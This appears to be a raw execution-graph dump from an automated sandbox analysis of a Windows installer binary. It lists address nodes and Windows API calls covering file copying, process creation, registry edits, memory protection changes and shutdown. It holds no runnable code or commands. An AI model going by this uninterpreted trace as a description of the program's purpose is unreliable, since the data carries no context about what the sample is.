                                                                                                    execution_graph 4988 10001000 4991 1000101b 4988->4991 4998 1000152e 4991->4998 4993 10001020 4994 10001024 4993->4994 4995 10001027 GlobalAlloc 4993->4995 4996 10001555 3 API calls 4994->4996 4995->4994 4997 10001019 4996->4997 4999 10001243 3 API calls 4998->4999 5001 10001534 4999->5001 5000 1000153a 5000->4993 5001->5000 5002 10001546 GlobalFree 5001->5002 5002->4993 5003 401d41 GetDC GetDeviceCaps 5004 402b1d 18 API calls 5003->5004 5005 401d5f MulDiv ReleaseDC 5004->5005 5006 402b1d 18 API calls 5005->5006 5007 401d7e 5006->5007 5008 405d99 18 API calls 5007->5008 5009 401db7 CreateFontIndirectW 5008->5009 5010 4024e8 5009->5010 5011 401a42 5012 402b1d 18 API calls 5011->5012 5013 401a48 5012->5013 5014 402b1d 18 API calls 5013->5014 5015 4019f0 5014->5015 5016 402746 5017 402741 5016->5017 5017->5016 5018 402756 FindNextFileW 5017->5018 5019 4027a8 5018->5019 5021 402761 5018->5021 5022 405d77 lstrcpynW 5019->5022 5022->5021 5023 401cc6 5024 402b1d 18 API calls 5023->5024 5025 401cd9 SetWindowLongW 5024->5025 5026 4029c7 5025->5026 4313 401dc7 4321 402b1d 4313->4321 4315 401dcd 4316 402b1d 18 API calls 4315->4316 4317 401dd6 4316->4317 4318 401de8 EnableWindow 4317->4318 4319 401ddd ShowWindow 4317->4319 4320 4029c7 4318->4320 4319->4320 4322 405d99 18 API calls 4321->4322 4323 402b31 4322->4323 4323->4315 4324 401bca 4325 402b1d 18 API calls 4324->4325 4326 401bd1 4325->4326 4327 402b1d 18 API calls 4326->4327 4328 401bdb 4327->4328 4329 401beb 4328->4329 4330 402b3a 18 API calls 4328->4330 4331 401bfb 4329->4331 4332 402b3a 18 API calls 4329->4332 4330->4329 4333 401c06 4331->4333 4334 401c4a 4331->4334 4332->4331 4336 402b1d 18 API calls 4333->4336 4335 402b3a 18 API calls 4334->4335 4337 401c4f 4335->4337 4338 401c0b 4336->4338 4339 402b3a 18 API calls 4337->4339 4340 402b1d 18 API calls 4338->4340 4342 401c58 FindWindowExW 4339->4342 4341 401c14 4340->4341 4343 401c3a SendMessageW 4341->4343 4344 401c1c SendMessageTimeoutW 4341->4344 4345 401c7a 4342->4345 4343->4345 4344->4345 4351 4014cb 4352 405021 25 API calls 4351->4352 4353 4014d2 4352->4353 5027 40194b 5028 402b1d 18 API calls 5027->5028 5029 401952 5028->5029 5030 402b1d 18 API calls 5029->5030 5031 40195c 5030->5031 5032 402b3a 18 API calls 5031->5032 5033 401965 5032->5033 5034 401979 lstrlenW 5033->5034 5039 4019b5 5033->5039 5035 401983 5034->5035 5035->5039 5040 405d77 lstrcpynW 5035->5040 5037 40199e 5038 4019ab lstrlenW 5037->5038 5037->5039 5038->5039 5040->5037 5041 4024cc 5042 402b3a 18 API calls 5041->5042 5043 4024d3 5042->5043 5046 4059e3 GetFileAttributesW CreateFileW 5043->5046 5045 4024df 5046->5045 5047 4063cc 5051 406250 5047->5051 5048 406bbb 5049 4062d1 GlobalFree 5050 4062da GlobalAlloc 5049->5050 5050->5048 5050->5051 5051->5048 5051->5049 5051->5050 5052 406351 GlobalAlloc 5051->5052 5053 406348 GlobalFree 5051->5053 5052->5048 5052->5051 5053->5052 4354 1000278d 4355 100027dd 4354->4355 4356 1000279d VirtualProtect 4354->4356 4356->4355 5054 40164d 5055 402b3a 18 API calls 5054->5055 5056 401653 5055->5056 5057 4060ba 2 API calls 5056->5057 5058 401659 5057->5058 5059 4019cf 5060 402b3a 18 API calls 5059->5060 5061 4019d6 5060->5061 5062 402b3a 18 API calls 5061->5062 5063 4019df 5062->5063 5064 4019e6 lstrcmpiW 5063->5064 5065 4019f8 lstrcmpW 5063->5065 5066 4019ec 5064->5066 5065->5066 5067 4040d0 lstrcpynW lstrlenW 4357 401e51 4358 402b3a 18 API calls 4357->4358 4359 401e57 4358->4359 4360 405021 25 API calls 4359->4360 4361 401e61 4360->4361 4375 4054f2 CreateProcessW 4361->4375 4364 401ec6 CloseHandle 4367 402793 4364->4367 4365 401e77 WaitForSingleObject 4366 401e89 4365->4366 4368 401e9b GetExitCodeProcess 4366->4368 4378 40611a 4366->4378 4370 401eba 4368->4370 4371 401ead 4368->4371 4370->4364 4372 401eb8 4370->4372 4382 405cbe wsprintfW 4371->4382 4372->4364 4376 405521 CloseHandle 4375->4376 4377 401e67 4375->4377 4376->4377 4377->4364 4377->4365 4377->4367 4379 406137 PeekMessageW 4378->4379 4380 401e90 WaitForSingleObject 4379->4380 4381 40612d DispatchMessageW 4379->4381 4380->4366 4381->4379 4382->4372 4433 401752 4434 402b3a 18 API calls 4433->4434 4435 401759 4434->4435 4436 401781 4435->4436 4437 401779 4435->4437 4473 405d77 lstrcpynW 4436->4473 4472 405d77 lstrcpynW 4437->4472 4440 40177f 4444 40600b 5 API calls 4440->4444 4441 40178c 4442 4057c2 3 API calls 4441->4442 4443 401792 lstrcatW 4442->4443 4443->4440 4450 40179e 4444->4450 4445 4060ba 2 API calls 4445->4450 4446 4059be 2 API calls 4446->4450 4448 4017b0 CompareFileTime 4448->4450 4449 401870 4451 405021 25 API calls 4449->4451 4450->4445 4450->4446 4450->4448 4450->4449 4453 405d77 lstrcpynW 4450->4453 4459 405d99 18 API calls 4450->4459 4465 405553 MessageBoxIndirectW 4450->4465 4469 401847 4450->4469 4471 4059e3 GetFileAttributesW CreateFileW 4450->4471 4454 40187a 4451->4454 4452 405021 25 API calls 4470 40185c 4452->4470 4453->4450 4455 402fa2 37 API calls 4454->4455 4456 40188d 4455->4456 4457 4018a1 SetFileTime 4456->4457 4458 4018b3 CloseHandle 4456->4458 4457->4458 4460 4018c4 4458->4460 4458->4470 4459->4450 4461 4018c9 4460->4461 4462 4018dc 4460->4462 4463 405d99 18 API calls 4461->4463 4464 405d99 18 API calls 4462->4464 4466 4018d1 lstrcatW 4463->4466 4467 4018e4 4464->4467 4465->4450 4466->4467 4468 405553 MessageBoxIndirectW 4467->4468 4468->4470 4469->4452 4469->4470 4471->4450 4472->4440 4473->4441 4474 402253 4475 40225b 4474->4475 4478 402261 4474->4478 4476 402b3a 18 API calls 4475->4476 4476->4478 4477 40227d 4481 402b3a 18 API calls 4477->4481 4479 402b3a 18 API calls 4478->4479 4482 40226f 4478->4482 4479->4482 4480 402b3a 18 API calls 4480->4477 4483 402286 WritePrivateProfileStringW 4481->4483 4482->4477 4482->4480 4499 402454 4500 402c44 19 API calls 4499->4500 4501 40245e 4500->4501 4502 402b1d 18 API calls 4501->4502 4503 402467 4502->4503 4504 402472 4503->4504 4507 402793 4503->4507 4505 40248b RegEnumValueW 4504->4505 4506 40247f RegEnumKeyW 4504->4506 4505->4507 4508 4024a4 RegCloseKey 4505->4508 4506->4508 4508->4507 5068 401ed4 5069 402b3a 18 API calls 5068->5069 5070 401edb 5069->5070 5071 4060ba 2 API calls 5070->5071 5072 401ee1 5071->5072 5074 401ef2 5072->5074 5075 405cbe wsprintfW 5072->5075 5075->5074 4510 4022d5 4511 402305 4510->4511 4512 4022da 4510->4512 4514 402b3a 18 API calls 4511->4514 4513 402c44 19 API calls 4512->4513 4515 4022e1 4513->4515 4516 40230c 4514->4516 4517 4022eb 4515->4517 4521 402322 4515->4521 4522 402b7a RegOpenKeyExW 4516->4522 4518 402b3a 18 API calls 4517->4518 4519 4022f2 RegDeleteValueW RegCloseKey 4518->4519 4519->4521 4523 402c0e 4522->4523 4525 402ba5 4522->4525 4523->4521 4524 402bcb RegEnumKeyW 4524->4525 4526 402bdd RegCloseKey 4524->4526 4525->4524 4525->4526 4527 402c02 RegCloseKey 4525->4527 4529 402b7a 3 API calls 4525->4529 4528 4060e1 3 API calls 4526->4528 4531 402bf1 4527->4531 4530 402bed 4528->4530 4529->4525 4530->4531 4532 402c1d RegDeleteKeyW 4530->4532 4531->4523 4532->4531 4533 4014d7 4534 402b1d 18 API calls 4533->4534 4535 4014dd Sleep 4534->4535 4537 4029c7 4535->4537 5083 404457 5084 404483 5083->5084 5085 404494 5083->5085 5144 405537 GetDlgItemTextW 5084->5144 5087 4044a0 GetDlgItem 5085->5087 5092 4044ff 5085->5092 5089 4044b4 5087->5089 5088 40448e 5091 40600b 5 API calls 5088->5091 5095 4044c8 SetWindowTextW 5089->5095 5100 40586d 4 API calls 5089->5100 5090 4045e3 5093 404784 5090->5093 5146 405537 GetDlgItemTextW 5090->5146 5091->5085 5092->5090 5092->5093 5096 405d99 18 API calls 5092->5096 5099 404023 8 API calls 5093->5099 5098 403fbc 19 API calls 5095->5098 5102 404573 SHBrowseForFolderW 5096->5102 5097 404613 5103 4058ca 18 API calls 5097->5103 5104 4044e4 5098->5104 5105 404798 5099->5105 5101 4044be 5100->5101 5101->5095 5109 4057c2 3 API calls 5101->5109 5102->5090 5106 40458b CoTaskMemFree 5102->5106 5107 404619 5103->5107 5108 403fbc 19 API calls 5104->5108 5110 4057c2 3 API calls 5106->5110 5147 405d77 lstrcpynW 5107->5147 5111 4044f2 5108->5111 5109->5095 5112 404598 5110->5112 5145 403ff1 SendMessageW 5111->5145 5115 4045cf SetDlgItemTextW 5112->5115 5120 405d99 18 API calls 5112->5120 5115->5090 5116 4044f8 5118 4060e1 3 API calls 5116->5118 5117 404630 5119 4060e1 3 API calls 5117->5119 5118->5092 5126 404638 5119->5126 5121 4045b7 lstrcmpiW 5120->5121 5121->5115 5124 4045c8 lstrcatW 5121->5124 5122 404677 5148 405d77 lstrcpynW 5122->5148 5124->5115 5125 40467e 5127 40586d 4 API calls 5125->5127 5126->5122 5130 40580e 2 API calls 5126->5130 5132 4046c9 5126->5132 5128 404684 GetDiskFreeSpaceW 5127->5128 5131 4046a7 MulDiv 5128->5131 5128->5132 5130->5126 5131->5132 5133 404733 5132->5133 5149 404805 5132->5149 5135 404756 5133->5135 5136 40140b 2 API calls 5133->5136 5157 403fde KiUserCallbackDispatcher 5135->5157 5136->5135 5137 404725 5139 404735 SetDlgItemTextW 5137->5139 5140 40472a 5137->5140 5139->5133 5142 404805 21 API calls 5140->5142 5141 404772 5141->5093 5158 4043ec 5141->5158 5142->5133 5144->5088 5145->5116 5146->5097 5147->5117 5148->5125 5150 404822 5149->5150 5151 405d99 18 API calls 5150->5151 5152 404857 5151->5152 5153 405d99 18 API calls 5152->5153 5154 404862 5153->5154 5155 405d99 18 API calls 5154->5155 5156 404893 lstrlenW wsprintfW SetDlgItemTextW 5155->5156 5156->5137 5157->5141 5159 4043fa 5158->5159 5160 4043ff SendMessageW 5158->5160 5159->5160 5160->5093 5161 404159 5163 40428b 5161->5163 5164 404171 5161->5164 5162 4042f5 5165 4043c7 5162->5165 5166 4042ff GetDlgItem 5162->5166 5163->5162 5163->5165 5170 4042c6 GetDlgItem SendMessageW 5163->5170 5167 403fbc 19 API calls 5164->5167 5172 404023 8 API calls 5165->5172 5168 404388 5166->5168 5169 404319 5166->5169 5171 4041d8 5167->5171 5168->5165 5177 40439a 5168->5177 5169->5168 5176 40433f 6 API calls 5169->5176 5192 403fde KiUserCallbackDispatcher 5170->5192 5174 403fbc 19 API calls 5171->5174 5175 4043c2 5172->5175 5179 4041e5 CheckDlgButton 5174->5179 5176->5168 5180 4043b0 5177->5180 5181 4043a0 SendMessageW 5177->5181 5178 4042f0 5183 4043ec SendMessageW 5178->5183 5190 403fde KiUserCallbackDispatcher 5179->5190 5180->5175 5182 4043b6 SendMessageW 5180->5182 5181->5180 5182->5175 5183->5162 5185 404203 GetDlgItem 5191 403ff1 SendMessageW 5185->5191 5187 404219 SendMessageW 5188 404236 GetSysColor 5187->5188 5189 40423f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5187->5189 5188->5189 5189->5175 5190->5185 5191->5187 5192->5178 5193 40155b 5194 40296d 5193->5194 5197 405cbe wsprintfW 5194->5197 5196 402972 5197->5196 4755 40165e 4756 402b3a 18 API calls 4755->4756 4757 401665 4756->4757 4758 402b3a 18 API calls 4757->4758 4759 40166e 4758->4759 4760 402b3a 18 API calls 4759->4760 4761 401677 MoveFileW 4760->4761 4762 401683 4761->4762 4763 40168a 4761->4763 4765 401423 25 API calls 4762->4765 4764 4060ba 2 API calls 4763->4764 4767 402197 4763->4767 4766 401699 4764->4766 4765->4767 4766->4767 4768 405c11 40 API calls 4766->4768 4768->4762 3923 405160 3924 405181 GetDlgItem GetDlgItem GetDlgItem 3923->3924 3925 40530c 3923->3925 3969 403ff1 SendMessageW 3924->3969 3927 405315 GetDlgItem CreateThread CloseHandle 3925->3927 3928 40533d 3925->3928 3927->3928 4042 4050f4 OleInitialize 3927->4042 3929 405368 3928->3929 3931 405354 ShowWindow ShowWindow 3928->3931 3932 40538d 3928->3932 3933 405374 3929->3933 3934 4053c8 3929->3934 3930 4051f2 3939 4051f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3930->3939 3974 403ff1 SendMessageW 3931->3974 3978 404023 3932->3978 3936 4053a2 ShowWindow 3933->3936 3937 40537c 3933->3937 3934->3932 3942 4053d6 SendMessageW 3934->3942 3945 4053c2 3936->3945 3946 4053b4 3936->3946 3975 403f95 3937->3975 3940 405268 3939->3940 3941 40524c SendMessageW SendMessageW 3939->3941 3947 40527b 3940->3947 3948 40526d SendMessageW 3940->3948 3941->3940 3944 40539b 3942->3944 3949 4053ef CreatePopupMenu 3942->3949 3951 403f95 SendMessageW 3945->3951 3992 405021 3946->3992 3970 403fbc 3947->3970 3948->3947 4003 405d99 3949->4003 3951->3934 3955 40528b 3958 405294 ShowWindow 3955->3958 3959 4052c8 GetDlgItem SendMessageW 3955->3959 3956 40541c GetWindowRect 3957 40542f TrackPopupMenu 3956->3957 3957->3944 3960 40544a 3957->3960 3961 4052b7 3958->3961 3962 4052aa ShowWindow 3958->3962 3959->3944 3963 4052ef SendMessageW SendMessageW 3959->3963 3964 405466 SendMessageW 3960->3964 3973 403ff1 SendMessageW 3961->3973 3962->3961 3963->3944 3964->3964 3965 405483 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3964->3965 3967 4054a8 SendMessageW 3965->3967 3967->3967 3968 4054d1 GlobalUnlock SetClipboardData CloseClipboard 3967->3968 3968->3944 3969->3930 3971 405d99 18 API calls 3970->3971 3972 403fc7 SetDlgItemTextW 3971->3972 3972->3955 3973->3959 3974->3929 3976 403fa2 SendMessageW 3975->3976 3977 403f9c 3975->3977 3976->3932 3977->3976 3979 40403b GetWindowLongW 3978->3979 3989 4040c4 3978->3989 3980 40404c 3979->3980 3979->3989 3981 40405b GetSysColor 3980->3981 3982 40405e 3980->3982 3981->3982 3983 404064 SetTextColor 3982->3983 3984 40406e SetBkMode 3982->3984 3983->3984 3985 404086 GetSysColor 3984->3985 3986 40408c 3984->3986 3985->3986 3987 404093 SetBkColor 3986->3987 3988 40409d 3986->3988 3987->3988 3988->3989 3990 4040b0 DeleteObject 3988->3990 3991 4040b7 CreateBrushIndirect 3988->3991 3989->3944 3990->3991 3991->3989 3993 40503c 3992->3993 4002 4050de 3992->4002 3994 405058 lstrlenW 3993->3994 3995 405d99 18 API calls 3993->3995 3996 405081 3994->3996 3997 405066 lstrlenW 3994->3997 3995->3994 3999 405094 3996->3999 4000 405087 SetWindowTextW 3996->4000 3998 405078 lstrcatW 3997->3998 3997->4002 3998->3996 4001 40509a SendMessageW SendMessageW SendMessageW 3999->4001 3999->4002 4000->3999 4001->4002 4002->3945 4008 405da6 4003->4008 4004 405ff1 4005 4053ff AppendMenuW 4004->4005 4037 405d77 lstrcpynW 4004->4037 4005->3956 4005->3957 4007 405e59 GetVersion 4007->4008 4008->4004 4008->4007 4009 405fbf lstrlenW 4008->4009 4012 405d99 10 API calls 4008->4012 4013 405ed4 GetSystemDirectoryW 4008->4013 4015 405ee7 GetWindowsDirectoryW 4008->4015 4017 405f1b SHGetSpecialFolderLocation 4008->4017 4018 405d99 10 API calls 4008->4018 4019 405f60 lstrcatW 4008->4019 4021 405c44 RegOpenKeyExW 4008->4021 4026 40600b 4008->4026 4035 405cbe wsprintfW 4008->4035 4036 405d77 lstrcpynW 4008->4036 4009->4008 4012->4009 4013->4008 4015->4008 4017->4008 4020 405f33 SHGetPathFromIDListW CoTaskMemFree 4017->4020 4018->4008 4019->4008 4020->4008 4022 405cb8 4021->4022 4023 405c78 RegQueryValueExW 4021->4023 4022->4008 4024 405c99 RegCloseKey 4023->4024 4024->4022 4033 406018 4026->4033 4027 40608e 4028 406093 CharPrevW 4027->4028 4030 4060b4 4027->4030 4028->4027 4029 406081 CharNextW 4029->4027 4029->4033 4030->4008 4032 40606d CharNextW 4032->4033 4033->4027 4033->4029 4033->4032 4034 40607c CharNextW 4033->4034 4038 4057ef 4033->4038 4034->4029 4035->4008 4036->4008 4037->4005 4039 4057f5 4038->4039 4040 40580b 4039->4040 4041 4057fc CharNextW 4039->4041 4040->4033 4041->4039 4049 404008 4042->4049 4044 405117 4048 40513e 4044->4048 4052 401389 4044->4052 4045 404008 SendMessageW 4046 405150 OleUninitialize 4045->4046 4048->4045 4050 404020 4049->4050 4051 404011 SendMessageW 4049->4051 4050->4044 4051->4050 4054 401390 4052->4054 4053 4013fe 4053->4044 4054->4053 4055 4013cb MulDiv SendMessageW 4054->4055 4055->4054 4056 4023e0 4067 402c44 4056->4067 4058 4023ea 4071 402b3a 4058->4071 4061 4023fe RegQueryValueExW 4062 402424 RegCloseKey 4061->4062 4063 40241e 4061->4063 4066 402793 4062->4066 4063->4062 4077 405cbe wsprintfW 4063->4077 4068 402b3a 18 API calls 4067->4068 4069 402c5d 4068->4069 4070 402c6b RegOpenKeyExW 4069->4070 4070->4058 4072 402b46 4071->4072 4073 405d99 18 API calls 4072->4073 4074 402b67 4073->4074 4075 4023f3 4074->4075 4076 40600b 5 API calls 4074->4076 4075->4061 4075->4066 4076->4075 4077->4062 4237 403ae4 4238 403c37 4237->4238 4239 403afc 4237->4239 4241 403c88 4238->4241 4242 403c48 GetDlgItem GetDlgItem 4238->4242 4239->4238 4240 403b08 4239->4240 4244 403b13 SetWindowPos 4240->4244 4245 403b26 4240->4245 4243 403ce2 4241->4243 4251 401389 2 API calls 4241->4251 4246 403fbc 19 API calls 4242->4246 4247 404008 SendMessageW 4243->4247 4268 403c32 4243->4268 4244->4245 4248 403b43 4245->4248 4249 403b2b ShowWindow 4245->4249 4250 403c72 SetClassLongW 4246->4250 4280 403cf4 4247->4280 4252 403b65 4248->4252 4253 403b4b DestroyWindow 4248->4253 4249->4248 4254 40140b 2 API calls 4250->4254 4255 403cba 4251->4255 4256 403b6a SetWindowLongW 4252->4256 4257 403b7b 4252->4257 4306 403f45 4253->4306 4254->4241 4255->4243 4260 403cbe SendMessageW 4255->4260 4256->4268 4258 403c24 4257->4258 4259 403b87 GetDlgItem 4257->4259 4265 404023 8 API calls 4258->4265 4263 403bb7 4259->4263 4264 403b9a SendMessageW IsWindowEnabled 4259->4264 4260->4268 4261 40140b 2 API calls 4261->4280 4262 403f47 DestroyWindow EndDialog 4262->4306 4267 403bbc 4263->4267 4270 403bc4 4263->4270 4271 403c0b SendMessageW 4263->4271 4272 403bd7 4263->4272 4264->4263 4264->4268 4265->4268 4266 403f76 ShowWindow 4266->4268 4273 403f95 SendMessageW 4267->4273 4269 405d99 18 API calls 4269->4280 4270->4267 4270->4271 4271->4258 4275 403bf4 4272->4275 4276 403bdf 4272->4276 4274 403bf2 4273->4274 4274->4258 4278 40140b 2 API calls 4275->4278 4310 40140b 4276->4310 4277 403fbc 19 API calls 4277->4280 4281 403bfb 4278->4281 4280->4261 4280->4262 4280->4268 4280->4269 4280->4277 4282 403fbc 19 API calls 4280->4282 4297 403e87 DestroyWindow 4280->4297 4281->4258 4281->4267 4283 403d6f GetDlgItem 4282->4283 4284 403d84 4283->4284 4285 403d8c ShowWindow KiUserCallbackDispatcher 4283->4285 4284->4285 4307 403fde KiUserCallbackDispatcher 4285->4307 4287 403db6 EnableWindow 4290 403dca 4287->4290 4288 403dcf GetSystemMenu EnableMenuItem SendMessageW 4289 403dff SendMessageW 4288->4289 4288->4290 4289->4290 4290->4288 4308 403ff1 SendMessageW 4290->4308 4309 405d77 lstrcpynW 4290->4309 4293 403e2d lstrlenW 4294 405d99 18 API calls 4293->4294 4295 403e43 SetWindowTextW 4294->4295 4296 401389 2 API calls 4295->4296 4296->4280 4298 403ea1 CreateDialogParamW 4297->4298 4297->4306 4299 403ed4 4298->4299 4298->4306 4300 403fbc 19 API calls 4299->4300 4301 403edf GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4300->4301 4302 401389 2 API calls 4301->4302 4303 403f25 4302->4303 4303->4268 4304 403f2d ShowWindow 4303->4304 4305 404008 SendMessageW 4304->4305 4305->4306 4306->4266 4306->4268 4307->4287 4308->4290 4309->4293 4311 401389 2 API calls 4310->4311 4312 401420 4311->4312 4312->4267 5198 401ce5 GetDlgItem GetClientRect 5199 402b3a 18 API calls 5198->5199 5200 401d17 LoadImageW SendMessageW 5199->5200 5201 401d35 DeleteObject 5200->5201 5202 4029c7 5200->5202 5201->5202 5203 40206a 5204 402b3a 18 API calls 5203->5204 5205 402071 5204->5205 5206 402b3a 18 API calls 5205->5206 5207 40207b 5206->5207 5208 402b3a 18 API calls 5207->5208 5209 402084 5208->5209 5210 402b3a 18 API calls 5209->5210 5211 40208e 5210->5211 5212 402b3a 18 API calls 5211->5212 5213 402098 5212->5213 5214 4020ac CoCreateInstance 5213->5214 5215 402b3a 18 API calls 5213->5215 5217 4020cb 5214->5217 5215->5214 5216 401423 25 API calls 5218 402197 5216->5218 5217->5216 5217->5218 4346 40156b 4347 401584 4346->4347 4348 40157b ShowWindow 4346->4348 4349 401592 ShowWindow 4347->4349 4350 4029c7 4347->4350 4348->4347 4349->4350 5226 4024ee 5227 4024f3 5226->5227 5228 40250c 5226->5228 5229 402b1d 18 API calls 5227->5229 5230 402512 5228->5230 5231 40253e 5228->5231 5235 4024fa 5229->5235 5233 402b3a 18 API calls 5230->5233 5232 402b3a 18 API calls 5231->5232 5234 402545 lstrlenW 5232->5234 5236 402519 WideCharToMultiByte lstrlenA 5233->5236 5234->5235 5237 402567 WriteFile 5235->5237 5238 402793 5235->5238 5236->5235 5237->5238 5239 4018ef 5240 401926 5239->5240 5241 402b3a 18 API calls 5240->5241 5242 40192b 5241->5242 5243 4055ff 71 API calls 5242->5243 5244 401934 5243->5244 5245 402770 5246 402b3a 18 API calls 5245->5246 5247 402777 FindFirstFileW 5246->5247 5248 40278a 5247->5248 5249 40279f 5247->5249 5250 4027a8 5249->5250 5253 405cbe wsprintfW 5249->5253 5254 405d77 lstrcpynW 5250->5254 5253->5250 5254->5248 5255 4014f1 SetForegroundWindow 5256 4029c7 5255->5256 5257 4018f2 5258 402b3a 18 API calls 5257->5258 5259 4018f9 5258->5259 5260 405553 MessageBoxIndirectW 5259->5260 5261 401902 5260->5261 4484 401df3 4485 402b3a 18 API calls 4484->4485 4486 401df9 4485->4486 4487 402b3a 18 API calls 4486->4487 4488 401e02 4487->4488 4489 402b3a 18 API calls 4488->4489 4490 401e0b 4489->4490 4491 402b3a 18 API calls 4490->4491 4492 401e14 4491->4492 4496 401423 4492->4496 4495 401e4c 4497 405021 25 API calls 4496->4497 4498 401431 ShellExecuteW 4497->4498 4498->4495 5262 402573 5263 402b1d 18 API calls 5262->5263 5265 402582 5263->5265 5264 4026a0 5265->5264 5266 4025c8 ReadFile 5265->5266 5267 405a66 ReadFile 5265->5267 5268 4026a2 5265->5268 5269 402608 MultiByteToWideChar 5265->5269 5271 4026b3 5265->5271 5272 40262e SetFilePointer MultiByteToWideChar 5265->5272 5266->5264 5266->5265 5267->5265 5274 405cbe wsprintfW 5268->5274 5269->5265 5271->5264 5273 4026d4 SetFilePointer 5271->5273 5272->5265 5273->5264 5274->5264 5280 4026f9 5281 402700 5280->5281 5283 402972 5280->5283 5282 402b1d 18 API calls 5281->5282 5284 40270b 5282->5284 5285 402712 SetFilePointer 5284->5285 5285->5283 5286 402722 5285->5286 5288 405cbe wsprintfW 5286->5288 5288->5283 5289 1000103d 5290 1000101b 8 API calls 5289->5290 5291 10001056 5290->5291 4779 4031ff #17 SetErrorMode OleInitialize 4780 4060e1 3 API calls 4779->4780 4781 403242 SHGetFileInfoW 4780->4781 4852 405d77 lstrcpynW 4781->4852 4783 40326d GetCommandLineW 4853 405d77 lstrcpynW 4783->4853 4785 40327f GetModuleHandleW 4786 403297 4785->4786 4787 4057ef CharNextW 4786->4787 4788 4032a6 CharNextW 4787->4788 4793 4032b6 4788->4793 4789 40338b 4790 40339f GetTempPathW 4789->4790 4854 4031cb 4790->4854 4792 4033b7 4794 403411 DeleteFileW 4792->4794 4795 4033bb GetWindowsDirectoryW lstrcatW 4792->4795 4793->4789 4796 4057ef CharNextW 4793->4796 4803 40338d 4793->4803 4862 402d69 GetTickCount GetModuleFileNameW 4794->4862 4797 4031cb 11 API calls 4795->4797 4796->4793 4799 4033d7 4797->4799 4799->4794 4802 4033db GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4799->4802 4800 4034bd 4947 403667 4800->4947 4801 403425 4801->4800 4804 4034ad 4801->4804 4809 4057ef CharNextW 4801->4809 4807 4031cb 11 API calls 4802->4807 4944 405d77 lstrcpynW 4803->4944 4890 403741 4804->4890 4811 403409 4807->4811 4812 403440 4809->4812 4811->4794 4811->4800 4819 403487 4812->4819 4820 4034ec lstrcatW lstrcmpiW 4812->4820 4813 4034d6 4816 405553 MessageBoxIndirectW 4813->4816 4814 4035cc 4815 40364f ExitProcess 4814->4815 4817 4060e1 3 API calls 4814->4817 4821 4034e4 ExitProcess 4816->4821 4822 4035db 4817->4822 4823 4058ca 18 API calls 4819->4823 4820->4800 4824 403508 CreateDirectoryW SetCurrentDirectoryW 4820->4824 4825 4060e1 3 API calls 4822->4825 4826 403493 4823->4826 4827 403520 4824->4827 4828 40352b 4824->4828 4830 4035e4 4825->4830 4826->4800 4945 405d77 lstrcpynW 4826->4945 4954 405d77 lstrcpynW 4827->4954 4955 405d77 lstrcpynW 4828->4955 4832 4060e1 3 API calls 4830->4832 4834 4035ed 4832->4834 4838 40363b ExitWindowsEx 4834->4838 4843 4035fb GetCurrentProcess 4834->4843 4835 4034a2 4946 405d77 lstrcpynW 4835->4946 4837 405d99 18 API calls 4839 40356a DeleteFileW 4837->4839 4838->4815 4840 403648 4838->4840 4841 403577 CopyFileW 4839->4841 4849 403539 4839->4849 4842 40140b 2 API calls 4840->4842 4841->4849 4842->4815 4847 40360b 4843->4847 4844 4035c0 4845 405c11 40 API calls 4844->4845 4845->4800 4846 405c11 40 API calls 4846->4849 4847->4838 4848 405d99 18 API calls 4848->4849 4849->4837 4849->4844 4849->4846 4849->4848 4850 4054f2 2 API calls 4849->4850 4851 4035ab CloseHandle 4849->4851 4850->4849 4851->4849 4852->4783 4853->4785 4855 40600b 5 API calls 4854->4855 4856 4031d7 4855->4856 4857 4031e1 4856->4857 4858 4057c2 3 API calls 4856->4858 4857->4792 4859 4031e9 CreateDirectoryW 4858->4859 4860 405a12 2 API calls 4859->4860 4861 4031fd 4860->4861 4861->4792 4956 4059e3 GetFileAttributesW CreateFileW 4862->4956 4864 402da9 4882 402db9 4864->4882 4957 405d77 lstrcpynW 4864->4957 4866 402dcf 4867 40580e 2 API calls 4866->4867 4868 402dd5 4867->4868 4958 405d77 lstrcpynW 4868->4958 4870 402de0 GetFileSize 4871 402edc 4870->4871 4884 402df7 4870->4884 4959 402d05 4871->4959 4873 402ee5 4875 402f15 GlobalAlloc 4873->4875 4873->4882 4971 4031b4 SetFilePointer 4873->4971 4874 40319e ReadFile 4874->4884 4970 4031b4 SetFilePointer 4875->4970 4877 402f48 4879 402d05 6 API calls 4877->4879 4879->4882 4880 402efe 4883 40319e ReadFile 4880->4883 4881 402f30 4885 402fa2 37 API calls 4881->4885 4882->4801 4886 402f09 4883->4886 4884->4871 4884->4874 4884->4877 4884->4882 4887 402d05 6 API calls 4884->4887 4888 402f3c 4885->4888 4886->4875 4886->4882 4887->4884 4888->4882 4888->4888 4889 402f79 SetFilePointer 4888->4889 4889->4882 4891 4060e1 3 API calls 4890->4891 4892 403755 4891->4892 4893 40375b 4892->4893 4894 40376d 4892->4894 4981 405cbe wsprintfW 4893->4981 4895 405c44 3 API calls 4894->4895 4896 40379d 4895->4896 4898 4037bc lstrcatW 4896->4898 4899 405c44 3 API calls 4896->4899 4900 40376b 4898->4900 4899->4898 4972 403a17 4900->4972 4903 4058ca 18 API calls 4904 4037ee 4903->4904 4905 403882 4904->4905 4907 405c44 3 API calls 4904->4907 4906 4058ca 18 API calls 4905->4906 4908 403888 4906->4908 4909 403820 4907->4909 4910 403898 LoadImageW 4908->4910 4911 405d99 18 API calls 4908->4911 4909->4905 4917 403841 lstrlenW 4909->4917 4921 4057ef CharNextW 4909->4921 4912 40393e 4910->4912 4913 4038bf RegisterClassW 4910->4913 4911->4910 4916 40140b 2 API calls 4912->4916 4914 4038f5 SystemParametersInfoW CreateWindowExW 4913->4914 4915 403948 4913->4915 4914->4912 4915->4800 4920 403944 4916->4920 4918 403875 4917->4918 4919 40384f lstrcmpiW 4917->4919 4923 4057c2 3 API calls 4918->4923 4919->4918 4922 40385f GetFileAttributesW 4919->4922 4920->4915 4926 403a17 19 API calls 4920->4926 4924 40383e 4921->4924 4925 40386b 4922->4925 4927 40387b 4923->4927 4924->4917 4925->4918 4928 40580e 2 API calls 4925->4928 4929 403955 4926->4929 4982 405d77 lstrcpynW 4927->4982 4928->4918 4931 403961 ShowWindow LoadLibraryW 4929->4931 4932 4039e4 4929->4932 4934 403980 LoadLibraryW 4931->4934 4935 403987 GetClassInfoW 4931->4935 4933 4050f4 5 API calls 4932->4933 4936 4039ea 4933->4936 4934->4935 